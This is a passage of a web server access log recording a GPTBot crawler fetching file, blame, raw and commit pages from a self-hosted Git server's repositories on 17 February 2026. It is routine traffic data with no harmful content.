"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13641] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9997] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12017] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" -[17/Feb/2026:15:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService" [Client 74.7.227.38] [Length 33069] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" -[17/Feb/2026:15:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj" [Client 74.7.227.38] [Length 32491] [Gzip 7.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" -[17/Feb/2026:15:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15953] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:15:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13162] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" -[17/Feb/2026:15:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13195] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" -[17/Feb/2026:15:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13164] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" -[17/Feb/2026:15:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" -[17/Feb/2026:15:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" -[17/Feb/2026:15:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:15:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:15:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" -[17/Feb/2026:15:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2fdata%2flogs%2fproxy-host-1_access.log" [Client 74.7.227.38] [Length 17993] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:15:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2fdata%2flogs%2fproxy-host-4_access.log" [Client 74.7.227.38] [Length 19603] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:15:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11631] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" -[17/Feb/2026:15:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore?display=source" [Client 74.7.227.38] [Length 11127] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" -[17/Feb/2026:15:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile?display=source" [Client 74.7.227.38] [Length 12476] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" -[17/Feb/2026:15:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" -[17/Feb/2026:15:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=mostissues&state=all" [Client 74.7.227.38] [Length 8483] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=mostissues&state=open" -[17/Feb/2026:15:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=leastissues&state=all" [Client 74.7.227.38] [Length 8477] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=leastissues&state=open" -[17/Feb/2026:15:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11296] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11295] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12995] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12949] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12949] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10234] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11295] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12995] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10237] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json?display=source" [Client 74.7.227.38] [Length 12788] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" -[17/Feb/2026:15:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18063] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:15:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1555] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:15:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1555] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:15:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10982] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 18045] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject" [Client 74.7.227.38] [Length 242056] [Gzip 16.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" -[17/Feb/2026:15:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:15:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md?display=source" [Client 74.7.227.38] [Length 11760] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" -[17/Feb/2026:15:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" -[17/Feb/2026:15:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14470] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" -[17/Feb/2026:15:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16685] [Gzip 5.23] [Sent-to 